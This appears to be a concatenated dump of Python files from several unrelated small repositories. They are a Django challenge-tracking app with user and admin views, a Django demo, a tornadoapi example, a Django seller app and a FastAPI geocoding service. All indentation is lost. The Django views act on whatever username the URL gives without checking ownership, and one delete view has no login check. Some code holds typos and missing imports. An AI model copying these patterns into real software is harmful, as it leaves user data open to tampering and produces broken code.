from .forms import UserForm,UserDetailForm
from django.http import HttpResponse,HttpResponseRedirect
from django.contrib.auth import login
from django.utils import timezone
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate,login,logout
from django.urls import reverse
from .models import User,UserDetail
from user_admin.models import UserAdmin,Challenges,AppliedChallenges
from idil import settings
import os
import cv2
# Create your views here.
@login_required
def home(request,username):
context={}
print(username+'sjh')
user_list=User.objects.all()
challenges=Challenges.objects.all()
ac=AppliedChallenges.objects.all()
context['challenges']=challenges
appl=True
p=0
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
users=UserDetail.objects.all()
for user2 in users:
if str(user2)==str(username):
context['usd']=user2
for c in challenges:
for a in ac:
if str(a.challenge)==str(c.name) and str(a.user)==str(context['usr']):
p=a.points
appl=False
break
context['a']=appl
context['p']=p
return render(request,'basic_app/home.html',context)
@login_required
def acc(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_detail_list=UserDetail.objects.all()
for user2 in user_detail_list:
if str(user2)==str(username):
context['usd']=user2
return render(request,'basic_app/acc.html',context)
@login_required
def upload(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_details_list=UserDetail.objects.all()
for user2 in user_details_list:
if str(user2)==str(username):
context['usd']=user2
if request.method=="POST":
if len(request.FILES)!=0:
img = request.FILES['pic']
img_extension = os.path.splitext(img.name)[1]
s=settings.MEDIA_ROOT
s=os.path.join(s, 'profile_pics')
if context['usd'].profile_pic:
c=str(context['usd'].profile_pic).split("/")[1]
k=os.path.join(s,c)
print("ghxc")
if os.path.exists(k):
os.remove(k)
context['usd'].profile_pic=request.FILES['pic']
context['usd'].save()
return render(request,'basic_app/acc.html',context)
else:
print("Image not there")
context['usd'].profile_pic=request.FILES['pic']
context['usd'].save()
return render(request,'basic_app/acc.html',context)
@login_required
def save(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_detail_list=UserDetail.objects.all()
for user2 in user_detail_list:
if str(user2)==str(username):
context['usd']=user2
if request.method=="POST":
context['usr'].email=request.POST.get('email')
context['usr'].save()
return render(request,'basic_app/acc.html',context)
@login_required
def update(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_detail_list=UserDetail.objects.all()
for user2 in user_detail_list:
if str(user2)==str(username):
context['usd']=user2
if request.method=="POST":
context['usr'].first_name=request.POST.get('fn')
context['usr'].last_name=request.POST.get('ln')
context['usr'].save()
return render(request,'basic_app/acc.html',context)
@login_required
def change(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_detail_list=UserDetail.objects.all()
for user2 in user_detail_list:
if str(user2)==str(username):
context['usd']=user2
if request.method=="POST":
user1=authenticate(username=username,password=request.POST.get('op'))
if user1==None:
context['er']=True
else:
if request.POST.get('op')==request.POST.get('np'):
context['dm']=True
else:
context['usr'].set_password(request.POST.get('np'))
context['usr'].save()
return render(request,'basic_app/acc.html',context)
@login_required
def user_logout(request):
#request.session.flush()
logout(request)
return redirect('/')
def index(request):
context={}
context['name']='Saikat'
# user_form=UserForm(data=request.POST)
# user_detail_form=UserDetailForm(data=request.POST)
# context['user_form']=user_form
# context['user_detail_form']=user_detail_form
return render(request,'basic_app/index.html',context)
def login_register(request):
show_div=False
print(request.method)
if request.GET.get('login'):
show_div=False
elif request.GET.get('reg'):
show_div=True
context={}
context['error']=False
user_form=UserForm(data=request.POST)
user_detail_form=UserDetailForm(data=request.POST)
user_detail1=UserDetail
if request.method == "POST" and show_div:
print(user_form.is_valid())
print(user_detail_form.is_valid())
if user_form.is_valid() and user_detail_form.is_valid():
user = user_form.save(commit=False)
user.set_password(user.password)
user_detail=user_detail_form.save(commit=False)
user_detail.user=user
if len(request.FILES)!=0:
p=request.FILES['profile_pic']
p=str(p)
print(p)
if p.endswith('.jpg') or p.endswith('.jpeg') or p.endswith('.png'):
user_detail.profile_pic=request.FILES['profile_pic']
user.save()
user_detail.save()
request.session['username']=user.username
login(request,user)
return redirect('/basic_app/home')
else:
context['show_div']=True
context['user_form']=user_form
context['user_detail_form']=user_detail_form
context['warning']=True
return render(request,'basic_app/login.html',context)
else:
user.save()
user_detail.save()
request.session['username']=user.username
login(request,user)
return redirect('/basic_app/home')
elif request.method == "POST" and not show_div:
username=request.POST.get('username')
password=request.POST.get('password')
user1=authenticate(username=username,password=password)
if user1!=None:
user_detail_list=UserDetail.objects.all()
ef=False
for user2 in user_detail_list:
if str(user2)==str(user1):
ef=True
break
user_admin_list=UserAdmin.objects.all()
af=False
for user2 in user_admin_list:
if str(user2)==str(user1):
print(user2)
af=True
break
request.session['username']=user1.username
if af:
u=str(user1)
url = reverse('admin', kwargs={'username': u})
print(url)
login(request,user1)
return HttpResponseRedirect(url)
elif ef:
u=str(user1)
url = reverse('user', kwargs={'username': u})
login(request,user1)
return HttpResponseRedirect(url)
else:
context['error']=True
context['user_form']=user_form
context['user_detail_form']=user_detail_form
context['show_div']=show_div
return render(request,'basic_app/login.html',context)
@login_required
def show(request,username):
c_name=username.split('_')[1]
print(c_name)
username=username.split("_")[0]
challenges=Challenges.objects.all()
ac=AppliedChallenges.objects.all()
appl=True
context={}
for c in challenges:
if str(c)==c_name:
context['ch']=c
user_list=User.objects.all()
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_detail_list=UserDetail.objects.all()
for user2 in user_detail_list:
if str(user2)==str(username):
context['usd']=user2
for a in ac:
if str(a.challenge)==str(context['ch']) and str(a.user)==str(context['usr']):
appl=False
break
context['a']=appl
return render(request,'basic_app/show.html',context)
@login_required
def apply(request,username):
print(username)
u=username.split("_")[0]
c=username.split("_")[1]
a=AppliedChallenges()
n=0
challenges=Challenges.objects.all()
for ca in challenges:
if str(ca.name)==c:
n=ca.applicant
break
n=n+1
l=AppliedChallenges.objects.filter(user=u).filter(challenge=c)
if(len(l)==0):
Challenges.objects.filter(pk=c).update(applicant=n)
a.user=u
a.challenge=c
a.save()
url = reverse('user', kwargs={'username': u})
return HttpResponseRedirect(url)
--- FILE SEPARATOR ---
from django.contrib import admin
from .models import UserAdmin,Challenges
# Register your models here.
admin.site.register(UserAdmin)
admin.site.register(Challenges)
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-19 18:28
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import user_admin.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserAdmin',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('role', models.CharField(default='admin', max_length=128)),
('profile_pic', models.ImageField(blank=True, null=True, upload_to=user_admin.models.path_and_rename)),
('last_login', models.DateTimeField(blank=True, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 17:56
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user_admin', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Challenges',
fields=[
('name', models.CharField(max_length=255, primary_key=True, serialize=False)),
('technology', models.CharField(max_length=255)),
('account', models.CharField(max_length=255)),
('capability', models.CharField(max_length=255)),
('applicant_status', models.CharField(default='NOT FILLED', max_length=255)),
('date_posted', models.DateField(default=datetime.date.today)),
('expiry_date', models.DateField()),
('applicant', models.IntegerField(default=0)),
('manager', models.CharField(max_length=255)),
('owner', models.CharField(max_length=255)),
('desc', models.CharField(max_length=255)),
('points', models.IntegerField()),
('category', models.CharField(max_length=255)),
],
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 22:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user_admin', '0002_challenges'),
]
operations = [
migrations.AlterField(
model_name='challenges',
name='applicant_status',
field=models.CharField(blank=True, default='NOT_FILLED', max_length=255),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 22:45
from django.db import migrations, models
import user_admin.models
class Migration(migrations.Migration):
dependencies = [
('user_admin', '0003_auto_20200821_0413'),
]
operations = [
migrations.AlterField(
model_name='challenges',
name='applicant_status',
field=models.CharField(default=user_admin.models.o, max_length=255),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 22:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user_admin', '0004_auto_20200821_0415'),
]
operations = [
migrations.AlterField(
model_name='challenges',
name='applicant_status',
field=models.CharField(default='0000000', editable=False, max_length=7),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-20 22:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('user_admin', '0005_auto_20200821_0418'),
]
operations = [
migrations.RemoveField(
model_name='challenges',
name='applicant_status',
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-21 06:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user_admin', '0006_remove_challenges_applicant_status'),
]
operations = [
migrations.AddField(
model_name='challenges',
name='applicant_status',
field=models.CharField(default='NOT FILLED', max_length=255),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-23 08:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('user_admin', '0007_challenges_applicant_status'),
]
operations = [
migrations.CreateModel(
name='AppliedChallenges',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('completed', models.BooleanField(default=False)),
('points', models.IntegerField(default=0)),
('challenge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='user_admin.Challenges')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-23 08:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user_admin', '0008_appliedchallenges'),
]
operations = [
migrations.AlterField(
model_name='appliedchallenges',
name='challenge',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='user_admin.Challenges'),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.3 on 2020-08-23 08:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user_admin', '0009_auto_20200823_1351'),
]
operations = [
migrations.AlterField(
model_name='appliedchallenges',
name='challenge',
field=models.CharField(max_length=255),
),
migrations.AlterField(
model_name='appliedchallenges',
name='user',
field=models.CharField(max_length=255),
),
]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
import os
from uuid import uuid4
import datetime
def path_and_rename(instance, filename):
upload_to = 'profile_pics'
ext = filename.split('.')[-1]
# get filename
if instance.pk:
filename = '{}.{}'.format(instance.pk, ext)
else:
# set filename as random string
filename = '{}.{}'.format(uuid4().hex, ext)
# return the whole path to the file
return os.path.join(upload_to, filename)
# Create your models here.
def o():
return "NOT FILLED"
class UserAdmin(models.Model):
user=models.OneToOneField(User,on_delete=models.CASCADE)
role=models.CharField(max_length=128,default='admin')
profile_pic=models.ImageField(upload_to=path_and_rename,blank=True,null=True)
last_login = models.DateTimeField(blank=True,null=True)
def __str__(self):
return self.user.username
class Challenges(models.Model):
name=models.CharField(primary_key=True,max_length=255)
technology=models.CharField(max_length=255)
account=models.CharField(max_length=255)
capability=models.CharField(max_length=255)
applicant_status=models.CharField(max_length=255,default="NOT FILLED")
date_posted=models.DateField(default=datetime.date.today)
expiry_date=models.DateField()
applicant=models.IntegerField(default=0)
manager=models.CharField(max_length=255)
owner=models.CharField(max_length=255)
desc=models.CharField(max_length=255)
points=models.IntegerField()
category=models.CharField(max_length=255)
def __str__(self):
return self.name
class AppliedChallenges(models.Model):
user=models.CharField(max_length=255)
challenge=models.CharField(max_length=255)
completed=models.BooleanField(default=False)
points=models.IntegerField(default=0)
def __str__(self):
return self.user+'_'+self.challenge
--- FILE SEPARATOR ---
from django.urls import path,include
from user_admin import views1
app_name='user_admin'
urlpatterns = [
path('acc/<username>',views1.acc,name='acc'),
path('upload/<username>',views1.upload,name='upload'),
path('save/<username>',views1.save,name='save'),
path('change/<username>',views1.change,name='change'),
path('update/<username>',views1.update,name='update'),
path('add/<username>',views1.add,name="add"),
path('save_challenge/<username>',views1.save_challenge,name="save_challenge"),
path('edit/<username>',views1.edit,name='edit'),
path('show/<username>',views1.show,name='show'),
path('delete/<username>',views1.delete,name='delete'),
path('admin_logout/',views1.user_logout,name='admin_logout'),
path('applicants/<username>',views1.applicants,name='applicants'),
path('complete/<username>',views1.complete,name='complete')
]
--- FILE SEPARATOR ---
from django.shortcuts import render
from django.shortcuts import render,redirect
from django.http import HttpResponse,HttpResponseRedirect
from django.contrib.auth import login
from django.utils import timezone
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate,login,logout
from django.urls import reverse
from basic_app.models import User,UserDetail
from user_admin.models import UserAdmin,Challenges,AppliedChallenges
from idil import settings
import os
import cv2
# Create your views here.
@login_required
def index(request,username):
context={}
print(username+'sjh')
user_list=User.objects.all()
challenges=Challenges.objects.all()
context['challenges']=challenges
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
return render(request,'user_admin/index.html',context)
@login_required
def acc(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
return render(request,'user_admin/acc.html',context)
@login_required
def upload(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
if request.method=="POST":
if len(request.FILES)!=0:
img = request.FILES['pic']
img_extension = os.path.splitext(img.name)[1]
s=settings.MEDIA_ROOT
s=os.path.join(s, 'profile_pics')
if context['uad'].profile_pic:
c=str(context['uad'].profile_pic).split("/")[1]
k=os.path.join(s,c)
print("ghxc")
if os.path.exists(k):
os.remove(k)
context['uad'].profile_pic=request.FILES['pic']
context['uad'].save()
return render(request,'user_admin/acc.html',context)
else:
print("Image not there")
context['uad'].profile_pic=request.FILES['pic']
context['uad'].save()
return render(request,'user_admin/acc.html',context)
@login_required
def save(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
if request.method=="POST":
context['usr'].email=request.POST.get('email')
context['usr'].save()
return render(request,'user_admin/acc.html',context)
@login_required
def update(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
if request.method=="POST":
context['usr'].first_name=request.POST.get('fn')
context['usr'].last_name=request.POST.get('ln')
context['usr'].save()
return render(request,'user_admin/acc.html',context)
@login_required
def change(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
if request.method=="POST":
user1=authenticate(username=username,password=request.POST.get('op'))
if user1==None:
context['er']=True
else:
if request.POST.get('op')==request.POST.get('np'):
context['dm']=True
else:
context['usr'].set_password(request.POST.get('np'))
context['usr'].save()
return render(request,'user_admin/acc.html',context)
@login_required
def add(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
return render(request,'user_admin/add.html',context)
@login_required
def save_challenge(request,username):
user_list=User.objects.all()
context={}
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
if request.method=="POST":
challange=Challenges()
challange.name=request.POST.get('cn')
challange.technology=request.POST.get('tech')
challange.account=request.POST.get('acc')
challange.capability=request.POST.get('cap')
challange.applicant_status=request.POST.get('astat')
challange.expiry_date=request.POST.get('edate')
challange.category=request.POST.get('cat')
challange.manager=request.POST.get('manager')
challange.owner=request.POST.get('powner')
challange.points=request.POST.get('points')
challange.desc=request.POST.get('desc')
challange.applicant_status="NOT FILLED"
challange.save()
url = reverse('admin', kwargs={'username': username})
return HttpResponseRedirect(url)
@login_required
def edit(request,username):
c_name=username.split('_')[1]
username=username.split("_")[0]
challenges=Challenges.objects.all()
context={}
k=Challenges()
for c in challenges:
if str(c)==c_name:
context['ch']=c
k=c
user_list=User.objects.all()
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
if request.method=="POST":
c = Challenges.objects.get(name=k.name)
print("ed"+c.name)
c.name=request.POST.get('cn')
c.technology=request.POST.get('tech')
c.account=request.POST.get('acc')
c.capability=request.POST.get('cap')
c.applicant_status=request.POST.get('astat')
c.expiry_date=request.POST.get('edate')
c.category=request.POST.get('cat')
c.manager=request.POST.get('manager')
c.owner=request.POST.get('powner')
c.points=request.POST.get('points')
c.desc=request.POST.get('desc')
c.date_posted=k.date_posted
c.applicant=request.POST.get('applicant')
c.save()
url = reverse('admin', kwargs={'username': username})
return HttpResponseRedirect(url)
return render(request,'user_admin/edit.html',context)
def delete(request,username):
c_name=username.split('_')[1]
username=username.split("_")[0]
challenges=Challenges.objects.all()
for c in challenges:
if str(c)==c_name:
c.delete()
url = reverse('admin', kwargs={'username': username})
return HttpResponseRedirect(url)
@login_required
def show(request,username):
c_name=username.split('_')[1]
print(c_name)
username=username.split("_")[0]
challenges=Challenges.objects.all()
context={}
for c in challenges:
if str(c)==c_name:
context['ch']=c
user_list=User.objects.all()
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
return render(request,'user_admin/show.html',context)
@login_required
def user_logout(request):
#request.session.flush()
logout(request)
return redirect('/')
@login_required
def applicants(request,username):
c_name=username.split('_')[1]
username=username.split("_")[0]
challenges=Challenges.objects.all()
context={}
for c in challenges:
if str(c)==c_name:
context['ch']=c
break
user_list=User.objects.all()
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
break
appl=AppliedChallenges.objects.filter(challenge=str(context['ch']))
context['appls']=appl
for a in appl:
o=User.objects.filter(username=a.user)
context['o']=o
h=[]
e=dict()
for i in o:
a=AppliedChallenges.objects.filter(challenge=str(context['ch'])).filter(user=i.username)
for r in a:
e[i.username]=r.completed
print(e[i.username])
context['e']=e
return render(request,'user_admin/applicants.html',context)
@login_required
def complete(request,username):
c_name=username.split('_')[1]
print(c_name)
username=username.split("_")[0]
challenges=Challenges.objects.all()
context={}
for c in challenges:
if str(c)==c_name:
context['ch']=c
break
user_list=User.objects.all()
for u in user_list:
if str(u)==str(username):
user_info=u
context['usr']=user_info
user_admin_list=UserAdmin.objects.all()
for user2 in user_admin_list:
if str(user2)==str(username):
context['uad']=user2
break
|
[
"/idil/basic_app/forms.py",
"/idil/basic_app/migrations/0003_auto_20200817_2347.py",
"/idil/basic_app/migrations/0006_auto_20200819_2225.py",
"/idil/basic_app/models.py",
"/idil/basic_app/urls.py",
"/idil/basic_app/views.py",
"/idil/user_admin/admin.py",
"/idil/user_admin/migrations/0001_initial.py",
"/idil/user_admin/migrations/0002_challenges.py",
"/idil/user_admin/migrations/0003_auto_20200821_0413.py",
"/idil/user_admin/migrations/0004_auto_20200821_0415.py",
"/idil/user_admin/migrations/0005_auto_20200821_0418.py",
"/idil/user_admin/migrations/0006_remove_challenges_applicant_status.py",
"/idil/user_admin/migrations/0007_challenges_applicant_status.py",
"/idil/user_admin/migrations/0008_appliedchallenges.py",
"/idil/user_admin/migrations/0009_auto_20200823_1351.py",
"/idil/user_admin/migrations/0010_auto_20200823_1354.py",
"/idil/user_admin/models.py",
"/idil/user_admin/urls.py",
"/idil/user_admin/views1.py"
] |
007freddythomas/django
|
from django.contrib import admin
from django.urls import path
from. views import reguser
urlpatterns = [
path('register',reguser)
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
def reguser(request):
return HttpResponse("<h1>Registration Page<h1>")
--- FILE SEPARATOR ---
from django.contrib import admin
from django.urls import path
from. views import product
urlpatterns = [
path('product',product),
]
--- FILE SEPARATOR ---
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.template import loader
def product(request):
template = loader.get_template("productinfo.html")
data={"name": "VIVO",
"desc": " Smart Phone",
"price": 45555}
return HttpResponse(template.render(data,request))
|
[
"/manageuser/urls.py",
"/manageuser/views.py",
"/product/urls.py",
"/product/views.py"
] |
007gzs/tornadoapi-example
|
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
from tornadoapi import fields
from tornadoapi.conf import settings
from tornadoapi.core.err_code import ErrCode
from tornadoapi.core.exceptions import CustomError
from tornadoapi.handler import ApiHandler, ApiDocHandler
class BaseHandler(ApiHandler):
def options(self, *args, **kwargs):
self.finish()
class TestHandler(BaseHandler):
test_param = fields.CharField(description='测试参数', default=None)
test_body = fields.JSONField(description='请求体测试', required=False, raw_body=True)
test_choice = fields.ChoiceField(description='选择参数', default=None, choices=((0, '选项0'), (1, '选项1')))
@classmethod
def get_return_sample(cls):
return ErrCode.SUCCESS.get_res_dict(data={'test_param': '测试参数', 'test_choice': '选择参数', 'title': '配置中TITLE'})
@classmethod
def get_handler_name(cls):
return '测试'
@classmethod
def get_handler_remark(cls):
return '测试 备注'
@classmethod
def get_handler_description(cls):
return '测试 描述'
def get(self, *args, **kwargs):
action = None
if self.test_body and isinstance(self.test_body, dict):
if 'action' not in self.test_body:
raise CustomError(ErrCode.ERR_ACTION_NOT_FOUND)
else:
action = self.test_body['action']
ret = {
'test_param': self.test_param,
'test_choice': self.test_choice,
'body_action': action,
'title': settings.TITLE
}
self.write_api(ret)
post = get
default_handlers = [
(r'doc', ApiDocHandler),
(r'test', TestHandler, {}, '测试'),
(r'test/(?P<test_param>.*?)', TestHandler, {}, '测试url_param'),
]
--- FILE SEPARATOR ---
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
import os
from tornado import web
from tornadoapi.conf import settings
from tornadoapi.core import url_path_join
from tornadoapi.handler import NotFoundHandler
base_dir = os.getcwd()
def load_handlers(name):
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
class TestApiApplication(web.Application):
def __init__(self):
config = {
'debug': settings.DEBUG,
'xsrf_cookies': False,
'gzip': True,
'autoreload': False,
'base_url': '/api/',
'headers': {"Access-Control-Allow-Origin": "*"}
}
handlers = self.init_handlers(config)
super(TestApiApplication, self).__init__(handlers, **config)
def init_handlers(self, config):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
handlers.extend(load_handlers('api.handlers'))
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(config['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', NotFoundHandler))
return new_handlers
--- FILE SEPARATOR ---
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
import os
from config.local_settings import * # NOQA
DEBUG = os.environ.get('IS_DEBUG', '1') != '0'
TITLE = 'test'
ERROR_CODE_DEFINE = (
('ERR_ACTION_NOT_FOUND', 10001, '未找到 action '),
)
--- FILE SEPARATOR ---
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
import os
if __name__ == '__main__':
os.environ.setdefault("TORNADOAPI_SETTINGS_MODULE", "config.settings")
from tornado import ioloop, httpserver
from tornado.options import options, define, parse_command_line
import tornadoapi
from app import TestApiApplication
tornadoapi.setup()
define("port", default=8888, help="run on the given port", type=int)
parse_command_line()
io_loop = ioloop.IOLoop.instance()
app = TestApiApplication()
http_server = httpserver.HTTPServer(app)
http_server.listen(options.port)
print("server start in 0.0.0.0:%d" % options.port)
io_loop.start()
|
[
"/api/handlers.py",
"/app.py",
"/config/settings.py",
"/main.py"
] |
007hakan/django-project
|
from django.contrib import admin
from .models import Satici
# Register your models here.
class SaticiAdmin(admin.ModelAdmin):
list_display = ('id','header','text','created_date')
list_display_links = ('id','header')
list_filter = ("header",'created_date')
search_fields = ('header','text')
list_per_page = 10
admin.site.register(Satici,SaticiAdmin)
--- FILE SEPARATOR ---
from django.apps import AppConfig
class SaticiConfig(AppConfig):
name = 'satici'
--- FILE SEPARATOR ---
from django import forms
from .models import Satici
class SaticiForm(forms.ModelForm):
class Meta:
model = Satici
fields = [ 'img','header','text' ]
--- FILE SEPARATOR ---
from django.db import models
from datetime import datetime
# Create your models here.
class Satici(models.Model):
header = models.CharField(max_length=200)
text = models.TextField()
img = models.ImageField(blank=True,verbose_name='Fotograf ekle')
created_date = models.DateTimeField(default = datetime.now,blank=True)
def __str__(self):
return self.header
--- FILE SEPARATOR ---
from django.urls import path
from . import views
app_name='satici'
urlpatterns = [
path("",views.index,name="index"),
path("urunler/<int:satici_id>",views.urunler,name="urunler"),
path("urun_ekle/",views.urun_ekle,name="urun_ekle"),
path("urun_sil/<int:satici_id>",views.urun_sil,name="urun_sil"),
path("urun_guncelle/<int:satici_id>",views.urun_guncelle,name="urun_guncelle"),
path("about/",views.about,name="about"),
]
--- FILE SEPARATOR ---
from django import forms
class RegisterForm(forms.Form):
username = forms.CharField(max_length = 30, label = 'Username')
password = forms.CharField(max_length =30, label ="Password", widget = forms.PasswordInput)
confirm = forms.CharField(max_length =30, label ="Confirm Password", widget = forms.PasswordInput)
def clean(self):
username = self.cleaned_data.get("username")
password = self.cleaned_data.get("password")
confirm = self.cleaned_data.get("confirm")
if password and confirm and confirm != password:
raise forms.ValdationError("Passwords did not match!")
values = {
'username': username,
'password': password
}
return values
class LoginForm(forms.Form):
username = forms.CharField(label='Username')
password = forms.CharField(label='Password',widget=forms.PasswordInput)
|
[
"/satici/admin.py",
"/satici/apps.py",
"/satici/forms.py",
"/satici/models.py",
"/satici/urls.py",
"/user/forms.py"
] |
007ksv/geoApp
|
from fastapi import APIRouter
from . import geo_coding, geo_distance, reverse_geocoding
main_router = APIRouter()
main_router.include_router(geo_coding.router)
main_router.include_router(reverse_geocoding.router)
main_router.include_router(geo_distance.router)
--- FILE SEPARATOR ---
from fastapi import APIRouter
router = APIRouter(tags=["Geo coding"])
from .geo_code import *
--- FILE SEPARATOR ---
from src.models import GeocodingDetailModel, GeocodingModel
from src.utils.address import get_address_details
from src.utils.response import create_response
from . import router
@router.post("/address-detail")
def get_address_detail(adress: GeocodingModel):
addr = adress.address
address_detail = get_address_details(addr)
if address_detail:
response = GeocodingDetailModel(**address_detail)
return create_response(success=True, data=response.dict())
return create_response(success=True, data={})
--- FILE SEPARATOR ---
from fastapi import APIRouter
router = APIRouter(tags=["Geo Distance"])
from .geo_distance import *
--- FILE SEPARATOR ---
from src.models import GeoDistanceModel
from src.utils.geo_distance import calculate_geo_distance
from src.utils.response import create_response
from . import router
@router.post("/geo-distance")
def get_geo_distance(coords: GeoDistanceModel):
result_in = coords.result_in
point1 = (coords.geo_point1.latitude, coords.geo_point1.longitude)
point2 = (coords.geo_point2.latitude, coords.geo_point2.longitude)
distance = calculate_geo_distance(point1, point2, result_in)
response = {"result": distance}
return create_response(True, data=response)
--- FILE SEPARATOR ---
from fastapi import APIRouter
router = APIRouter(tags=["Reverse geocoding"])
from .reverse_geocode import *
--- FILE SEPARATOR ---
from src.models import GeocodingModel, ReverseGeocodingModel
from src.utils.address import get_reverse
from src.utils.response import create_response
from . import router
@router.post("/reverse")
def get_reverse_geocoding_details(coordinates: ReverseGeocodingModel):
coords = (coordinates.latitude, coordinates.longitude)
address = get_reverse(coords)
if address:
response = GeocodingModel(**address)
return create_response(success=True, data=response.dict())
return create_response(success=True, data={})
--- FILE SEPARATOR ---
from fastapi import FastAPI
from .api.routes import main_router
from .utils.response import create_response
app = FastAPI(debug=True)
@app.get("/v1/")
def home():
return create_response(True, data={"message": "Welcome to geoApp"})
app.include_router(main_router, prefix="/v1")
--- FILE SEPARATOR ---
from .geo_distance import *
from .geocoding import *
from .reverse_geocoding import *
--- FILE SEPARATOR ---
from typing import Optional
from pydantic import BaseModel, Field, validator
from .reverse_geocoding import ReverseGeocodingModel as CoordinatesModel
allowed_units = ["kilometers", "meters", "miles"]
class GeoDistanceModel(BaseModel):
geo_point1: CoordinatesModel
geo_point2: CoordinatesModel
result_in: Optional[str] = Field(
"kilometers", description="Unit of result distance"
)
@validator("result_in")
def validate_result_in(cls, value):
if not value.lower() in allowed_units:
raise ValueError("not a valid unit, options are " + ",".join(allowed_units))
return value
--- FILE SEPARATOR ---
from pydantic import BaseModel
from .reverse_geocoding import ReverseGeocodingModel
